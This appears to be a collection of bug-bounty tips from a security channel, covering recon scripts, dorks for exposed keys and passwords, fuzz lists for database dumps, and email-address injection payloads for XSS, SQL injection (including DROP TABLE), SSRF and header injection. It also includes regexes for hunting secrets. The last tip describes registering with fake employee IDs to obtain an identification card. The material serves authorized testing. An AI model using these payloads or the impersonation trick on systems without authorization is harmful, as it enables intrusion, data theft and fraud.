InfoSecTube
Subscribe to this channel if… you enjoy fun and educational videos about technology & CyberSecurity & ...
YouTube Channel:
https://youtube.com/c/InfoSecTube


Contact:
@InfoSecTube_Bot
#Bug_Bounty_Tips_6
🛡BugBounty_Tips

Before running this script we have to install a couple of additional tools:
amass
assetfinder
subfinder
filter-resolved

Here’s a quick and basic recon routine for finding subdomains while doing bug bounty:
#!/bin/bash
# $1 => example.domain
# usage: ./subs.sh example.com

# passive sources only (no DNS brute force); results go to domains_$1
amass enum --passive -d "$1" -o "domains_$1"
assetfinder --subs-only "$1" | tee -a "domains_$1"

subfinder -d "$1" -o "domains_subfinder_$1"
cat "domains_subfinder_$1" | tee -a "domains_$1"

# de-duplicate the merged list in place, then keep only names that resolve
sort -u "domains_$1" -o "domains_$1"
cat "domains_$1" | filter-resolved | tee -a "domains_$1.txt"
☣️@InfoSecTube
#Bug_Bounty_Tips_7
🛡BugBounty_Tips
Install Instruction:
apt-get -y install parallel
Here’s a super useful recon one-liner to quickly validate a list of hostnames and subdomains:
cat alive-subdomains.txt | parallel -j50 -q curl -w 'Status:%{http_code}\t  Size:%{size_download}\t %{url_effective}\n' -o /dev/null -sk
This one-liner spawns 50 instances of curl in parallel and prints the HTTP status code and response size in bytes for each host in a readable form😊 Keep in mind that -s -o /dev/null discards the body, -k accepts invalid certificates (so hosts with self-signed or mismatched certs still show up), a bare hostname is fetched over http only, and without -m a stalled host keeps one of the 50 slots busy indefinitely.
 
☣️@InfoSecTube
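As an added example (not the channel's own one-liner), the script below wraps the same parallel/curl probe so that bare hostnames are tried over both http and https, every request has a timeout, and the raw output can be summarized offline. The function names expand_schemes, probe, status_summary and alive are this example's own.

```shell
#!/usr/bin/env bash
# Added example, not the channel's one-liner: same parallel/curl probe, plus
# both schemes for bare hostnames, a per-request timeout and an offline summary.
# Function names are this example's own.
set -u

# curl treats a bare hostname as http://; emit http and https for each one
expand_schemes() {
  local h
  while read -r h; do
    [ -n "$h" ] || continue
    case $h in
      http://*|https://*) printf '%s\n' "$h" ;;
      *) printf 'http://%s\nhttps://%s\n' "$h" "$h" ;;
    esac
  done
}

# Probe the URLs on stdin, 50 at a time. -m 10 makes a stalled host give up
# its slot after ten seconds; -k keeps hosts with bad certificates in scope.
probe() {
  parallel -j50 -q curl -m 10 -sk -o /dev/null \
    -w 'Status:%{http_code}\tSize:%{size_download}\t%{url_effective}\n'
}

# Count probe output lines per status code, e.g. "000 3", "200 12" (offline)
status_summary() {
  awk -F'\t' '{ split($1, s, ":"); n[s[2]]++ } END { for (k in n) print k, n[k] }' | sort -n
}

# Keep only URLs that answered at all (curl reports 000 when it could not connect)
alive() {
  awk -F'\t' '$1 != "Status:000" { print $3 }'
}

# usage: ./probe.sh subdomains.txt   (raw results to probe.txt, summary on stdout)
if [ $# -eq 1 ]; then
  expand_schemes < "$1" | probe | tee probe.txt | status_summary
fi
```

Feed probe.txt to alive afterwards to get the list of reachable URLs for the next stage of recon.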
#Bug_Bounty_Tips_8
🛡BugBounty_Tips
Before running this script you must install several additional tools:
subfinder
amass
filter-resolved
httprobe
waybackurls
kxss

This shell script chains several open-source tools to find XSS (Cross-Site Scripting) candidates: kxss reports URL parameters whose values are reflected with characters such as < > " ' left unencoded, which still have to be confirmed manually:
#!/bin/bash
# $1 => example.domain

subfinder -d "$1" -o "domains_subfinder_$1"
amass enum --passive -d "$1" -o "domains_$1"

# merge both sources into domains_$1, de-duplicate, keep only names that resolve
cat "domains_subfinder_$1" | tee -a "domains_$1"
sort -u "domains_$1" -o "domains_$1"
cat "domains_$1" | filter-resolved | tee -a "domains_$1.txt"

# probe extra ports, pull historical URLs from the Wayback Machine and flag
# parameters whose values come back unencoded (XSS candidates)
cat "domains_$1.txt" | ~/go/bin/httprobe -p http:81 -p http:8080 -p https:8443 | waybackurls | kxss | tee xss.txt

☣️@InfoSecTube
#Bug_Bounty_Tips_9
🛡BugBounty_Tips
Sometimes, developers think that hiding a button is enough. Try accessing the following sign-up URIs.
Chances are that we will be able to register a new user and access privileged areas of the web application, or at least get a foothold into it.

☣️@InfoSecTube
#Bug_Bounty_Tips_10
🛡BugBounty_Tips
Here are the Top 5 Google dorks for identifying interesting and potentially sensitive information about our target:
inurl:example.com intitle:"index of"
inurl:example.com intitle:"index of /" "*key.pem"
inurl:example.com ext:log
inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv
inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git

With these dorks we are looking for open directory listings, log files, private keys, spreadsheets, database files and other interesting data. Note that inurl:example.com matches any URL containing that string, including paths and parameters on other hosts; use site:example.com instead when you want results limited to the target's own hostnames.

☣️@InfoSecTube
#Bug_Bounty_Tips_11
🛡BugBounty_Tips
If you are hunting on a Drupal website, fuzz with Burp Suite Intruder (or any other similar tool) on ‘/node/$’ where ‘$’ is a number (from 1 to 500). For example:
https://target.com/node/1
https://target.com/node/2
https://target.com/node/3

https://target.com/node/499
https://target.com/node/500

Chances are that we will find hidden pages (test, dev) which are not referenced by the search engines. Drupal answers 403 rather than 404 for unpublished nodes, so a 403 still confirms that the node ID exists.

☣️@InfoSecTube
#Bug_Bounty_Tips_12
🛡BugBounty_Tips
Before using this script you must install these additional tools:
gau
fff
gf
gf-secrets
Find sensitive information disclosure with the gf-secrets patterns. Here’s how to use them:
# Collect candidate URLs with gau and keep only .js / .json paths (query string stripped).
# grep -E has no Perl-style "(?:...)" group, so the portable pattern is "\.js(on)?$".
# (newer gau releases spell the flag --subs)
gau -subs target | cut -d'?' -f1 | grep -E '\.js(on)?$' | tee urls.txt
sort -u urls.txt | fff -s 200 -o out/

# After we save responses from known URLs, it's time to dig for secrets:
# run every installed gf pattern whose name contains "_secrets" over the
# current directory tree, which includes the saved bodies in out/
for i in $(gf -list); do case $i in *_secrets*) gf "$i" ;; esac; done
☣️@InfoSecTube
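The pipeline above as an added example that is not the channel's script: it keeps the gau/fff stages, fixes the .js/.json filter, and, because the gf-secrets pattern files are not reproduced here, greps the saved responses with a small pattern set of its own (an assumption; extend it or swap gf back in). js_urls, secret_patterns, scan_dir and run are names invented for this example.

```shell
#!/usr/bin/env bash
# Added example, not the channel's script. Collects JS/JSON URLs with gau,
# saves HTTP 200 bodies with fff, then greps them for secret-looking strings.
# js_urls, secret_patterns, scan_dir and run are names invented here; the
# regexes are this example's own, not gf-secrets' pattern files.
set -u

# Keep only URLs whose path ends in .js or .json, query string stripped.
# grep -E has no Perl "(?:...)" group; "\.js(on)?$" is the ERE equivalent.
js_urls() {
  cut -d'?' -f1 | grep -E '\.js(on)?$' | sort -u
}

# "name regex" per line; the name labels each hit in the scan output
secret_patterns() {
  cat <<'EOF'
aws_access_key AKIA[0-9A-Z]{16}
google_api_key AIza[0-9A-Za-z_-]{35}
slack_token xox[abpr]-[0-9A-Za-z-]{10,}
private_key -----BEGIN (RSA |EC |OPENSSH |)PRIVATE KEY-----
bearer_header [Aa]uthorization: *Bearer [A-Za-z0-9._~+/-]{16,}
generic_secret (api[_-]?key|secret|token|passw(or)?d)["'=: ]+[A-Za-z0-9_./+-]{8,}
EOF
}

# scan_dir DIR -> one "name<TAB>file<TAB>match" line per hit under DIR
scan_dir() {
  local dir=$1 name re file match
  secret_patterns | while read -r name re; do
    # -a treats binary-looking bodies as text, -o prints only the matched part,
    # -e keeps a pattern that starts with "-" from being read as an option
    grep -rHoaE -e "$re" "$dir" 2>/dev/null | while IFS=: read -r file match; do
      printf '%s\t%s\t%s\n' "$name" "$file" "$match"
    done
  done
}

# Full pipeline (needs network plus the gau and fff binaries);
# newer gau releases spell the flag --subs
run() {
  local target=$1
  gau -subs "$target" | js_urls | tee urls.txt | fff -s 200 -o out/
  scan_dir out/
}

if [ $# -eq 1 ]; then run "$1"; fi
```

Every hit is tagged with the pattern name, so the output can be sorted by type before the manual review that any secret finding needs (many "tokens" in JavaScript are public client IDs).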
#Bug_Bounty_Tips_13
🛡BugBounty_Tips

✔️Spring Boot is an open source Java-based framework used to build stand-alone Spring applications, typically packaged as microservices.

🔰Spring Boot Actuator adds HTTP endpoints for inspecting and managing a running application. Spring Boot 1.x exposes them at the web root; 2.x prefixes them with /actuator, so check both forms:
🔶https://target.com/env (2.x: https://target.com/actuator/env)
🔸https://target.com/heapdump (2.x: https://target.com/actuator/heapdump)
🔸etc.
#Shodan_Dorks
♦️Search for the following favicon hash in Shodan to find Spring Boot servers deployed in the target organization:
org:YOUR_TARGET http.favicon.hash:116323821

🔺Then check for exposed actuators. A readable /env already leaks configuration and frequently credentials; the known RCE paths additionally need /env to accept POST (Spring Boot 1.x, disabled by default in 2.x) together with a second component such as Spring Cloud's /refresh, so confirm that before claiming RCE. If /heapdump downloads, search the dump for private keys, tokens and passwords that were held in memory.

☣️@InfoSecTube
#Bug_Bounty_Tips_14
🛡BugBounty_Tips

🔺Here’s a quick tip to find forgotten database dumps using this small but quick fuzz list:
/back.sql
/backup.sql
/accounts.sql
/backups.sql
/clients.sql
/customers.sql
/data.sql
/database.sql
/database.sqlite
/users.sql
/db.sql
/db.sqlite
/db_backup.sql
/dbase.sql
/dbdump.sql
/setup.sql
/sqldump.sql
/dump.sql
/mysql.sql
/sql.sql
/temp.sql

🔰Old database dumps may contain all kinds of interesting information – user credentials, configuration settings, secrets and api keys, customer data and more.

☣️@InfoSecTube
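One way to run both sweeps (the Drupal /node/N range from tip 11 and the dump list from this tip) without drowning in false positives, as an added example rather than the channel's method: request a random path that cannot exist first, and treat any later response that looks like that baseline as a soft 404. node_paths, dump_paths, fetch, is_hit, fuzz and the 64-byte size threshold are this example's own assumptions.

```shell
#!/usr/bin/env bash
# Added example, not the channel's method: runs the Drupal /node/N sweep (tip 11)
# or the dump-file list (tip 14) and filters out "soft 404" responses by comparing
# each reply with the response for a random path that cannot exist. All function
# names and the 64-byte size threshold are this example's own assumptions.
set -u

# /node/1 .. /node/N (Drupal content IDs), default N=500
node_paths() {
  local n=${1:-500} i=1
  while [ "$i" -le "$n" ]; do
    printf '/node/%d\n' "$i"
    i=$((i + 1))
  done
}

# the dump filenames from the tip, each with a leading slash
dump_paths() {
  printf '/%s\n' back.sql backup.sql accounts.sql backups.sql clients.sql \
    customers.sql data.sql database.sql database.sqlite users.sql db.sql \
    db.sqlite db_backup.sql dbase.sql dbdump.sql setup.sql sqldump.sql \
    dump.sql mysql.sql sql.sql temp.sql
}

# fetch URL -> "STATUS SIZE" (network; 000 means curl could not connect)
fetch() {
  curl -sk -m 10 -o /dev/null -w '%{http_code} %{size_download}' "$1"
}

# is_hit STATUS SIZE BASE_STATUS BASE_SIZE
# A hit is a reachable, non-404 response that does not look like the baseline:
# same status as the baseline with a body within 64 bytes of it is a soft 404.
# A 403 is still a hit (Drupal answers 403 for unpublished nodes).
is_hit() {
  local st=$1 sz=$2 bst=$3 bsz=$4 d
  [ "$st" != 404 ] && [ "$st" != 000 ] || return 1
  if [ "$st" = "$bst" ]; then
    d=$((sz - bsz))
    [ "$d" -ge 0 ] || d=$((-d))
    [ "$d" -gt 64 ] || return 1
  fi
  return 0
}

# fuzz BASE_URL  (paths on stdin) -> "STATUS SIZE URL" for hits only
fuzz() {
  local base=$1 p r bl
  bl=$(fetch "$base/nope-$$-$(date +%s)")
  while read -r p; do
    r=$(fetch "$base$p")
    # $r and $bl each hold two words; word splitting is intended here
    if is_hit $r $bl; then
      printf '%s %s%s\n' "$r" "$base" "$p"
    fi
  done
}

# usage: ./fuzz.sh https://target.com node   or   ./fuzz.sh https://target.com dumps
if [ $# -eq 2 ]; then
  case $2 in
    node)  node_paths | fuzz "$1" ;;
    dumps) dump_paths | fuzz "$1" ;;
  esac
fi
```

The baseline comparison matters because many applications return 200 with a generic page for every unknown path; without it the whole /node/1..500 range would look like a hit. Pipe any other wordlist into fuzz the same way.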
#Bug_Bounty_Tips_15
🛡BugBounty_Tips
🌀The following payloads are all syntactically valid e-mail addresses (RFC 5322 permits quoted local parts, comments in parentheses and bracketed IP literals), so they pass many e-mail validators and can be used to test any input that accepts an address, not only web-based e-mail systems.
🔺XSS (Cross-Site Scripting):
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com

🔺Template injection:
"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com

🔺SQL injection:
"' OR 1=1 -- '"@example.com
"mail'); DROP TABLE users;--"@example.com

🔺SSRF (Server-Side Request Forgery):
[email protected]
john.doe@[127.0.0.1]

🔺Parameter pollution:
victim&[email protected]

🔺(Email) header injection:
"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"[email protected]>\r\nRCPT TO:<victim+"@test.com


☣️@InfoSecTube
#Bug_Bounty_Tips_16
🛡BugBounty_Tips
🌀Registering as an Employee leads to claiming Employee-Only Private Offers and ultimately obtaining an “Identification Card”.

Methodology:
1-Searched for the Target's employee offers on Google:
inurl:"Target Name" employee offers
2-Found website which provides offers to the Target.
3-Found that offers were restricted to employees only.
4-Tried registering with random numbers in the “Employee ID” field
5-Successfully registered as an employee because of no verification of the “Employee ID“.
6-Registering as an employee made it possible to claim the private offers.
7-The website also provides an “Identification Card” which can be used to show that we are a legitimate employee of the Target.
☣️@InfoSecTube